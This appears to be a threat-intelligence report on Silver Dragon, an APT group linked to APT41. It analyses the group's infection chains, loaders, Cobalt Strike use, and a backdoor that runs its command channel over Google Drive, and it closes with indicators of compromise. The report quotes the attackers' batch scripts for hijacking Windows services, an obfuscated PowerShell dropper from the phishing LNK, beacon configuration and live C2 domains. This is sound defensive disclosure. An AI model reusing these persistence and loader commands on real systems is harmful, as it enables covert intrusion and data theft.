Key FindingsCheck Point Research (CPR) is tracking Silver Dragon, an advanced persistent threat (APT) group which has been actively targeting organizations across Europe and Southeast Asia since at least mid-2024. The actor is likely operating within the umbrella of Chinese-nexus APT41.Silver Dragon gains its initial access by exploiting public-facing internet servers and by delivering phishing emails that contain malicious attachments. To maintain persistence, the group hijacks legitimate Windows services, which allows the malware processes to blend into normal system activity.As part of its recent operations, Silver Dragon deployed GearDoor, a new backdoor which leverages Google Drive as its command-and-control (C2) channel to enable covert communication and tasking over a trusted cloud service. In addition, the group deployed two additional custom tools: SSHcmd, a command-line utility that functions as a wrapper for SSH to facilitate remote access, and SliverScreen, a screen-monitoring tool used to capture periodic screenshots of user activity.IntroductionIn recent months, Check Point Research (CPR) has been tracking a sophisticated, Chinese-aligned threat group whose activity demonstrates operational correlation with campaigns previously associated with APT41. We have designated this activity cluster as Silver Dragon. This group actively targets organizations in Southeast Asia and Europe, with a particular focus on government entities. Silver Dragon employs a range of initial access techniques, primarily relying on the exploitation of public facing servers, and more recently, email-based phishing campaigns.To establish the initial foothold, the group deploys Cobalt Strike beacons to gain an early foothold on compromised hosts. In most observed cases, it then conducts command-and-control (C2) communication through DNS tunneling, enabling it to evade certain network-level detection mechanisms.During our research, we identified several custom post-exploitation tools the group uses, including a backdoor that leverages Google Drive as its C2 channel, which enables stealthy communication over a widely trusted cloud service.In this blog, we provide an overview of the observed campaigns, take a closer look at the Silver Dragon’s TTPs (Tactics, Techniques, and Procedures), and examine the tools used across their operations.Overview – Infection ChainsIn our analysis, we identified three main infection chains that Silver Dragon uses. In every case we observed, the chain ultimately delivered Cobalt Strike as the final payload. The group also appears to maintain its own custom malware, such as GearDoor, for exfiltrating information via Google Drive.Infection chains:AppDomain hijackingService DLLEmail phishing campaignThe first two infection chains, AppDomain hijacking and Service DLL, show clear operational overlap. They are both delivered via compressed archives, suggesting their use in post‑exploitation scenarios. In several cases, these chains were deployed following the compromise of publicly exposed vulnerable servers. Both chains rely on the delivery of a RAR archive containing an installation batch script, likely executed by the attackers, which indicates a shared delivery mechanism. We observed additional overlaps in the Cobalt Strike C2 infrastructure, further strengthening the linkage between the two chains.Notably, some files associated with both infection chains were uploaded to VirusTotal by the same submitter, which suggests that the chains were likely deployed in parallel, potentially targeting different machines within the same compromised network.The third infection chain was used in a phishing campaign with a malicious LNK file as an attachment, which we linked to Silver Dragon based on the use of similar loaders, which we refer to later as BamboLoader.AppDomain HijackingFigure 1 – High-level overview of the AppDomain hijacking infection chain.This chain, deployed by abusing AppDomain Hijacking (T1574.014). A very similar infection chain was observed by the Italian National Cybersecurity Agency (ACN) following the ToolShell exploitation wave in July 2025. The analyzed instance of this chain involves a RAR archive with the following components:A batch installation scriptAn XML configuration file (dfsvc.exe.config)A malicious .NET DLL (ServiceMoniker.dll) – MonikerLoaderAn encrypted module (ComponentModel.dll) – second-stage loaderAn encrypted CobaltStrike payload with the .sdb extensionIn this case, the installation batch script copies the config file and the dll files to C:\Windows\Microsoft.NET\Framework64\v4.0.30319, and the shellcode file to C:\Windows\AppPatch.The dfsvc.exe.config file overwrites the AppDomain entry point, redirecting execution to MonikerLoader. By placing this malicious config file in the same directory as the legitimate Windows utility dfsvc.exe, it is ensures that MonikerLoader is loaded every time dfsvc.exe is executed, leveraging a technique known as AppDomain hijacking. The batch script then deletes and recreates the legitimate DfSvc service to force a new execution of dfsvc.exe, thereby triggering the malicious loading sequence.copy ComponentModel.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComponentModel.dll /ycopy ServiceMoniker.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319 /ycopy backup.sdb C:\Windows\AppPatch /ycopy dfsvc.exe.config C:\Windows\Microsoft.NET\Framework64\v4.0.30319 /ysc delete DfSvcsc create DfSvc binPath= “C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe” start= auto obj= LocalSystem DisplayName= “Microsoft Manages ClickOnce applications and updates Service”sc description DfSvc “Microsoft .NET Framework ClickOnce Deployment Service”sc start DfSvcIn a similar attack, the group employed the same execution technique by abusing tzsync.exe, a legitimate Windows binary responsible for the Time Zone Synchronization service.MonikerLoaderMonikerLoader is a .NET-based loader whose strings are entirely obfuscated using a Brainfuck-based string decryption routine. Its classes and methods are deliberately named with random, legitimate-looking identifiers to hinder static analysis. MonikerLoader’s primary purpose is to decrypt and execute a second-stage loader directly in memory.Execution begins with the loader reading the ComponentModel.dll file and decrypting its contents using a simple ADD-XOR routine. The decrypted module is then reflectively loaded into memory. In older variants of MonikerLoader, the second-stage payload was not stored as a file; instead, the encrypted data was retrieved from the Windows Registry under HKLM\Software\Microsoft\Windows.Figure 2 – Strings in MonikerLoader are obfuscated using a Brainfuck-based encoding scheme.The second-stage loader closely mirrors MonikerLoader’s behavior and reuses the same string obfuscation and decryption mechanisms. This stage is responsible for configuring the malware’s service-based persistence and for decrypting and loading the final payload.To execute the final stage, the loader allocates a read-write-execute (RWE) memory region, copies the decrypted shellcode into that region, and executes it within the context of the running process. We identified the final payload as a Cobalt Strike beacon.Figure 3 – Decryption of a shellcode file and in-memory execution by MonikerLoader.Service DLL deploymentThis infection chain reflects a more minimal, straightforward approach. It is delivered in an archive with the following components:A batch installation scriptA shellcode DLL loader we named BamboLoaderEncrypted CobaltStrike shellcode file with a font extension style (.fon or .ttf)After the archive is extracted and the batch script is executed, it copies the BamboLoader DLL and the encrypted shellcode payload to a specific location. In most observed cases, the DLL is placed in C:\Windows\System32\wbem, while the encrypted shellcode file is written to C:\Windows\Fonts. Next, the batch script registers the BamboLoader to run as a Windows service by manipulating the registry using reg.exe. The script hijacks legitimate Windows services by first stopping and deleting the original service, then recreating it to execute the DLL under the context of a service.sc stop “bthsrv”sc delete “bthsrv”reg delete “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost” /v “bthsrv” /fcopy %1 “%dll_path%” /yreg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost” /v “bthsrv” /t REG_MULTI_SZ /d “bthsrv” /fsc create “bthsrv” binPath= “%SystemRoot%\system32\svchost.exe -k bthsrv” type= share start= auto error= ignore DisplayName= “Bluetooth Update Service”sc description “bthsrv” “Bluetooth Update Service”reg add “HKLM\SYSTEM\CurrentControlSet\Services\bthsrv” /v “FailureActions” /t REG_BINARY /d “0000000000000000000000000300000014000000010000000000000001000000000000000100000000000000” /freg add “HKLM\SYSTEM\CurrentControlSet\Services\bthsrv\Parameters” /freg add “HKLM\SYSTEM\CurrentControlSet\Services\bthsrv\Parameters” /v “ServiceDll” /t REG_EXPAND_SZ /d “%dll_path%” /freg add “HKLM\SYSTEM\CurrentControlSet\Services\bthsrv\Parameters” /v “ServiceMain” /t REG_SZ /d “TraceGetIMSIByIccID” /fnet start “bthsrv”We observed the following services being abused for persistence:Service NameService DescriptionwuausrvWindows Update ServicebthsrvBluetooth Update ServiceCOMSysAppSrvCOM+ System Application ServiceDfSvcMicrosoft .NET Framework ClickOnce Deployment ServicetzsyncWindows Updates timezone information ServiceBamboLoaderBamboLoader is a x64 binary written in C++ and is heavily obfuscated, employing control flow flattening and inserting junk code throughout its operations to hinder both static and dynamic analysis. The loader reads the staged shellcode payload from disk, decrypts it using RC4 with a hardcoded key, and then decompresses the resulting data with the LZNT1 algorithm via the RtlDecompressBuffer Windows API function. The decrypted and decompressed payload is then injected into a Windows process, such as taskhost.exe, which is created as a child process. The specific target binary is configurable within BamboLoader. Notably, the injected shellcode applies an additional layer of single-byte XOR encryption before decrypting the final stage. In the observed samples, the resulting payloads were Cobalt Strike beacons.Figure 4 – BamboLoader In-memory payload decryption followed by process injection.All files contained within the initial archive shared an identical creation timestamp, which strongly suggests the use of an automated payload generation framework. Supporting this assumption, we recovered a log file from one archive that appears to document per-attack configuration parameters, including file paths, service names, encryption keys, and injected processes.[*] Service DLL Path: C:\Windows\System32\wbem\WinSync.dll[*] Service Name: bthsrv[*] Display Name: Bluetooth Update Service[*] Service Entry Point: TraceGetIMSIByIccID[+] Encrypted Payload: C:\Windows\Fonts\OLDENGL.fon[+] RC4 Key: rOPdyiwITK[+] Injected Process: taskhostw.exe {6C741103-79B6-11F0-ACB2-38002560F520}[+] Installer BAT: usFUk.batPhishing ActivityIn addition, we observed the group conducting a phishing campaign that appears to primarily target Uzbekistan. As part of this campaign, victims received phishing emails containing weaponized LNK attachments. These shortcut files embed the next stage payload directly within their binary structure, resulting in files exceeding 1 MB in size.Upon execution, the LNK file launches cmd.exe, which in turn invokes PowerShell. The embedded PowerShell code locates the malicious LNK based on its file size, reads its raw byte contents, and extracts multiple embedded payloads by slicing predefined byte ranges. The extracted components are then written to the system’s temporary directory and executed, completing the delivery of the next-stage payload.%windir%\system32\cmd.exe /c pow%comspec:~-1%rshell -windowstyle hidden -c “$lnkpath = (Get-ChildItem -Filter *.lnk | Where-Object {$_.Length -eq 1413555} | Select-Object -First 1).FullName;$file = [System.IO.File]::ReadAllBytes($lnkpath);$directory = $env:TEMP;[System.IO.File]::WriteAllBytes((Join-Path $directory ‘§±§Ú§ã§î§Þ§à§®§£§¥.pdf’), $file[4184..663602]);[System.IO.File]::WriteAllBytes((Join-Path $directory ‘GameHook.exe’), $file[663603..823554]);[System.IO.File]::WriteAllBytes((Join-Path $directory ‘graphics-hook-filter64.dll’), $file[823555..1032962]);[System.IO.File]::WriteAllBytes((Join-Path $directory ‘simhei.dat’), $file[1032963..1413554]);ii (Join-Path $directory ‘§±§Ú§ã§î§Þ§à§®§£§¥.pdf’);ii (Join-Path $directory ‘GameHook.exe’);“The PowerShell payload drops the following files:Decoy documentGameHook.exe – Legitimate executable abused for DLL sideloadinggraphics-hook-filter64.dll – BamboLoader DLLsimhei.dat – Encrypted CobaltStrike payloadThe Decoy document is opened and the legitimate binary is executed in the background to sideload the BamboLoader.Figure 5 – Phishing lure masquerading as an official letter to government entities in Uzbekistan.Final Payload – CobaltStrikeWe identified the final payloads loaded by both BamboLoader and MonikerLoader as Cobalt Strike beacons. Across the observed samples, we identified at least three distinct watermark values, all of which are commonly associated with cracked versions of the Cobalt Strike framework. The majority of the observed implants were configured to communicate with their C2 infrastructure via DNS tunneling, while others relied on HTTP-based communication, typically with servers protected behind Cloudflare. In addition, we identified implants configured to communicate with other compromised hosts within the same network over SMB.BeaconType – Hybrid HTTP DNSSleepTime – 99000MaxGetSize – 1405005Jitter – 51MaxDNS – 252PublicKey_MD5 – 9d3f61dcaba90db2ede1c1906a80ace2C2Server – ns1.onedriveconsole[.]com,/d/msdownload/update/2021/11/33002773_x86_b78cd82ceba723.cab,ns2.onedriveconsole.com,/d/msdownload/update/2021/11/33002773_x86_b78cd82ceba723.cab,ns1.exchange4study.com,/d/msdownload/update/2021/11/33002773_x86_b78cd82ceba723.cabDNS_Idle – 104.21.51.8DNS_Sleep – 248HttpGet_Verb – GETHttpPost_Verb – POSTSpawnto_x86 – %windir%\syswow64\dllhost.exeSpawnto_x64 – %windir%\sysnative\dllhost.exePost-Exploitation ToolsSilverScreenSilverScreen, written in .NET, is a covert screen-monitoring malware designed to operate silently within an active user session while maintaining a minimal system footprint. Also called ComponentModel.dll, which mirrors naming conventions observed in some MonikerLoader variants, SilverScreen is also likely executed through AppDomain hijacking.When executed, the implant ensures single-instance execution and, if initially launched under the SYSTEM account, relaunches itself within the currently active desktop session using token impersonation.The malware continuously captures screenshots across all connected displays, including precise cursor positioning, providing operators with contextual insight into user behavior and interactions. To reduce noise and storage requirements, SilverScreen employs a change-detection mechanism based on grayscale thumbnail comparisons, capturing full-resolution images only when significant visual changes are detected. This selective approach enables long-term monitoring while limiting disk usage and lowering the likelihood of detection.Figure 6 – SilverScreen main loop operation.Captured images are compressed using a layered approach: JPEG encoding followed by GZIP compression and then appended to a local data file in a structured format suitable for later retrieval or exfiltration. The implant operates in a persistent loop with built-in file size thresholds, suggesting integration with a separate component responsible for data collection or exfiltration.SSHcmdThis component is a command-line SSH utility implemented in .NET that provides remote command execution and file transfer capabilities over SSH. Leveraging the Renci.SshNet library, the tool accepts connection parameters (IP address, port, username, and password) directly via command-line arguments, enabling operators to authenticate non-interactively to remote systems.The program supports multiple operational modes, including direct command execution, interactive TTY sessions, and bidirectional file transfer (upload and download). Commands can be in either plaintext or Base64-encoded form, a feature that can be used to evade basic command-line inspection or logging mechanisms. In TTY mode, the tool establishes an interactive shell session, which allows more complex command execution and operator interaction.Figure 7 – SSHcmd command line argument handling.GearDoorGearDoor is a .NET backdoor that communicates with its C2 infrastructure via Google Drive. The malware shares notable code similarities with MonikerLoader samples and uses the same Brainfuck-based string obfuscation technique.Configuration data and all file-based communication with Google Drive are encrypted using the DES algorithm, with the encryption key derived from the first 8 characters of the MD5 hash of a hardcoded key string.Each infected system is assigned a unique identifier generated from a SHA-256 hash of the machine name. The resulting hash is formatted into a GUID-like string (split using hyphens) and is used to create a dedicated folder in Google Drive which serves as the primary communication channel between the beacon and the operator.GearDoor attempts to retrieve three configuration values from the Windows Registry. If any of these values are missing, the malware falls back to hardcoded defaults embedded in the binary.ConfigRegistry KeyDefaultGoogle AccountHKLMtools88@wise-baton-452610-i5.iam.gserviceaccount.comBeacon IntervalHKLM600sCredential File PathHKLMC:.rbsAfter successfully authenticating to the Google Drive account, GearDoor uploads a heartbeat file. The file name consists of 10 random alphanumeric characters followed by the .png extension. The heartbeat content is a single pipe-delimited string containing the following information:MachineGUID |Hostname |Username |InternalIP |OSVersion |MachineId | |SleepTime |ProcessId |The Google Drive-based C2 architecture revolves around a single folder named after the infected machine’s identifier. All communication is file-based; the malware enumerates every file in the drive and determines the appropriate action solely based on the file’s extension. Each file extension serves as a tasking indicator, defining both the operation to perform and the execution logic applied by the malware. After a task is performed, the associated file is deleted from the drive, and the malware uploads an output file containing the task results.Operation setC2 Uploads (input)Beacon Uploads (output)Heartbeat file .pngFile management commands.pdf.dbSystem commands.cab.bakPayload delivery.rar.bakPlugin execution.7z.bakFigure 8 – File extensions handled by GearDoor..png – Heartbeat Files:Files with the .png extension are treated as heartbeat artifacts. The malware verifies whether the file name matches the most recent heartbeat it uploaded, and if not, it deletes the file..cab – Command Execution: The .cab extension delivers interactive commands to the beacon. Command strings are encrypted within the file contents, and when commands require arguments, they are provided as space-separated values within the same file. Although many commands are named after standard Windows utilities (e.g., whoami, ipconfig), none of them rely on external binaries. Instead, all functionality is implemented using native .NET APIs.The table below shows the supported commands:CommandArgumentsDescriptiondownloadUpload a file form machine to the drive.steal_tokenImpersonates the security token of the target process ID.revertNoneReverts impersonation and returns to the original security context.revert2selfNoneAlias for revert.helpNoneDisplays the built-in help/usage information.whoamiNoneReturns the current user context under which the implant is running.ipconfigNoneDisplays network interface configuration of the host.netstatNoneDisplays active network connections and listening ports.psNoneLists running processes on the system.mkdirCreates a directory at the specified path.cdChanges the current working directory.cdNoneDisplays the current working directory.pwdNonePrints the current working directory.dirLists files and folders in the specified directory.dirNoneLists files and folders in the current directory.rmDeletes the specified file or directory.sleepNoneDisplays the current beacon sleep interval (in seconds).sleepSets the beacon sleep interval to the specified number of seconds.runExecutes a command directly on the system and returns its output.shellExecutes a command via cmd.exe /c (Windows shell execution).execExecutes a command via a scheduled task mechanism.exitNoneImmediately terminates the current implant process.For example, the download command exfiltrates files from the infected host to Google Drive. The command accepts a local file path as an argument. Upon execution, the malware encrypts the specified file and uploads it to the Drive using the .zip extension. In addition to the exfiltrated file, the beacon uploads a second file containing the command execution status with the .bak file extension.Figure 9 – GearDoor – File exfiltration process.Reviewing the output of the help command indicates the tool is actively evolving. Some commands appear to have been removed while new capabilities were added, suggesting ongoing development and testing.usage:whoamiipconfignetstatpsmkdircdpwddir rm : Delete file/foldersleep : Set fetch files sleep timesleep: Get current sleep timeexit: Exit processsteal_token : Steal token by PIDrevert2self: Revert to Systemrun : Directly run shell : cmd /c exec : schedule runupload download assembly .rar – File Download & Self-UpdateFiles with the .rar extension are treated as downloaded payloads. The malware downloads, decrypts, and writes these files to disk using their original name, but without the .rar extension. It then responds with a status file using the .bak extension to indicate whether the operation succeeded. In some versions, if the .rar file is named wiatrace.bak, GearDoor recognizes it as a self-update package: the payload is dropped at C:\Windows\Debug\wiatrace.bak, its binary version is compared to the current GearDoor version, and if there is a mismatch, the binary is replaced and the malware process restarts.Figure 10 – GearDoor – File delivery process..7z – Plugin ExecutionFiles with the .7z extension implement plugin (execute-assembly) functionality. Each .7z file contains an encrypted .NET assembly binary, and the execution arguments are both encoded and encrypted within the filename. To maintain and track plugins in memory, the malware utilizes a small dictionary table, storing each plugin under a key that corresponds to the length of the assembly’s binary. If a plugin is not already present in memory, the malware adds it to the table and executes it directly from memory.Figure 11 – GrearDoor – Plugin execution process..pdf – File Management CommandsThe .pdf extension delivers basic file system management commands to the malware. It supports three types of directory operations: list (listing the contents of a directory), mkdir (creating a new directory), and delete (removing all files within a specified directory). After executing one of these commands, the malware responds with a .db file that reports the result of the requested operation.VictimologySilver Dragon primarily targets high-profile organizations, particularly within the government sector. Geographically, the majority of identified victims are located in Southeast Asia, with more limited but still notable activity observed in Europe.Figure 12 – Geographic distribution of targeted organizations.AttributionSilver Dragon is assessed with high confidence to be linked to a Chinese-nexus threat actor, likely operating within the umbrella of APT41, based on multiple converging indicators.Among those, most notably, we identified strong tradecraft similarities between the installation script used to deploy BamboLoader and a post-exploitation installation scripts previously attributed to APT41 and publicly reported by Mandiant in 2020. In both cases, the operators deploy a DLL-based loader by registering it as a Windows service through an almost identical sequence of commands. The workflow follows a consistent structure: defining the DLL path, service name, display name, and description; stopping and deleting any pre-existing service instance; copying the payload into C:\\Windows\\System32; and finally recreating and starting the newly configured service. Both scripts also use service and display names that impersonate legitimate Windows components.Figure 13 – Installation script attributed to APT41 by Mandiant.Figure 14 – Obfuscated installation script used by Silver Dragon.A retrospective search for structurally similar installation scripts in public malware repositories returned only these two distinct subsets of closely matching examples, further reinforcing the uniqueness of this implementation pattern.In both operations, the loaded shellcode ultimately deployed a version of a Cobalt Strike Beacon. Notably, the Beacon samples shared the same cracked-version watermark, and in several instances command-and-control communications were conducted over DNS tunneling.Additionally, the decryption mechanism used by BamboLoader consists of a multi-stage shellcode decryption chain involving RC4 decryption followed by LZNT1 decompression via the Windows API RtlDecompressBuffer. This specific sequence is a well-established routine frequently observed in shellcode loaders attributed to Chinese nexus APT activity.Finally, metadata analysis across multiple samples revealed compilation and file-creation timestamps that consistently align with UTC+8 (China Standard Time). While timestamp analysis alone is not conclusive, the repeated temporal alignment across independent samples provides further contextual support for a Chinese-nexus operational origin.ConclusionThis report details the operations of Silver Dragon, a sophisticated APT group assessed to be Chinese nexus and targets high-profile organizations in Southeast Asia and Europe, with a particular emphasis on government entities. Silver Dragon primarily gains initial access by exploiting public-facing servers but was also observed conducting phishing campaigns.Post-exploitation, the group leverages custom shellcode loaders and Cobalt Strike to establish persistence and maintain a foothold in compromised environments. Notably, we identified GearDoor, a novel backdoor which utilizes Google Drive as C2 channel. This approach not only evades traditional network defenses but also provides flexible and resilient infrastructure for ongoing operations. In addition, the group’s toolkit includes SilverScreen, a covert screen-monitoring implant, and SSHCmd, a lightweight SSH-based utility that enables remote command execution and file transfer, demonstrating a broad and versatile post-exploitation capability.Throughout our analysis, we observed that the group continuously evolves its tooling and techniques, actively testing and deploying new capabilities across different campaigns. The use of diverse vulnerability exploits, custom loaders, and sophisticated file-based C2 communication reflects a well-resourced and adaptable threat group.IoCTypeIoCC2 Domainzhydromet[.]comC2 Domainampolice[.]orgC2 Domainonedriveconsole[.]comC2 Domaincopilot-cloud[.]netC2 Domaindrivefrontend.pa-clients.workers[.]devC2 Domainrevitpourtous[.]comC2 Domainwikipedla[.]blogC2 Domainprotacik[.]comC2 Domainoicm[.]orgC2 Domainmindssurpass[.]comC2 Domainexchange4study[.]comC2 Domainsplunkds[.]comC2 Domainbigflx[.]netGearDoor4f93be0c46a53701b1777ab8df874c837df3d8256e026f138d60fc2932e569a8GearDoor7f89a4d5af47bc00a9ad58f0bcbe8a7be2662953dcd03f0e881cc5cbf6b7bca8SSHcmdbcbe2f0a8134c0e7fce18d0394ababc1d910e6f7b77b8c07643434cd14f4c5d6SilverScreen44e769efed3e4f9f04c52dcd13f15cead251a1a08827a2cb6ea68427522c7fbbSilverScreen85a03d2e74ae84093a74699057693d11e5c61f85b62e741778cbc5fc9f89022fPhishing LNK51684a0e356513486489986f5832c948107ff687c8501d64846cdc4307429413Phishing LNK166e777cb72a7c4e126f8ed97e0a82e7ca9e87df7793fea811daf34e1e7e47a6Phishing LNK948468aba5c851952ebe56a5bf37904ed83a6c8cb520304db6938d79892f0a1bBamboLoadere3b016f2fc865d0f53f635f740eb0203626517425ed9a2908058f96a3bcf470dBamboLoader967b5c611d304385807ea2d865fa561c15cde0473dd63e768679a4f29f0e4563BamboLoader43f8f94ca5aa0af7bfb0cc1d2f664a46500a161b2d082b48b516d084ef485348BamboLoader3128bdb8efaaa04c0ba96337252f4cc2dc795021cbc410f74ace9dde958bac1dBamboLoaderb93560c4d18120e113fb8b04a8aa05f66a12116d1fbf18a93186f6314381e97eBamboLoaderddaca57f3d5f4986da052ca172631b351410d6f5831f6af351699c6201cc011bBamboLoaderc4de1f1a8cb3b0392802ee56096ddb25b6f51c51350ce7c45e14d8c285765300BamboLoader7384462d420bdc9683a4cac2a8ad19353a2aa7d2244c91e9182345777e811e33BamboLoader74a11a07d167f8f5c0baa724d1f7708985c81d0ac3d0e4d7ef3f3220c335e009MonikerLoader5ad857df8976523cb3ad2fdf30e87c0e7daa64135716b139ffdcd209b98e1654MonikerLoader740a09fcdefa5a5f79355b720f54ff09efa64062229fb388adbccd9c829e9ff0MonikerLoader5341c7256542405abdd01ee288b08e49dcb6d1782be6b7bea63b459d80f9a8f5MonikerLoader3a2df7a2cfeca5ba315a29cf313268a53a22316c925e6b9760ead8f4df0d1f75MonikerLoader stage 22f787c1454891b242ab221b8b8b420373c3eb1a0c1fdcb624dd800c50758bbb0MonikerLoader stage 2568c67564d62b09d1a1bc29a494cf4bf31afddcafcf78592b178c63f23ccfcaeMonikerLoader stage 219139a525ee9c22efd6a4842c4cd50ab2c5f9ee391e5531071df0bb4e685f55dMonikerLoader stage 272e4b6540e32b8b7aac850055609bc5afc19e29834e9aa6be29a8ea59a2c9785Install bat16b9a7358be88632378ba20ba1430786f3b844694b1f876211ecdbecf5cccbc2Install bat37b485ed8d150d022c41e5e307b8c54c34ef806625b44d0c940b18be7d5b29ceInstall bat3e2a0bafbd44e24b17fd7b17c9f2b2a3727349971d42612d55bbc1732082619aInstall bat8c29f9189a9ad75a959024f59e68c62d42a6fd42f9eacf847128c7efe4ef7578Install batbd699ed720e2bd7085b3444cb8f4d36870b5b48df1055ec6cc1553db3eef7fafInstall bata6b5448ba45f3f352f5f4c5376024891adda1ef8ebf62a8fe63424fa230c691dThe post Silver Dragon Targets Organizations in Southeast Asia and Europe appeared first on Check Point Research.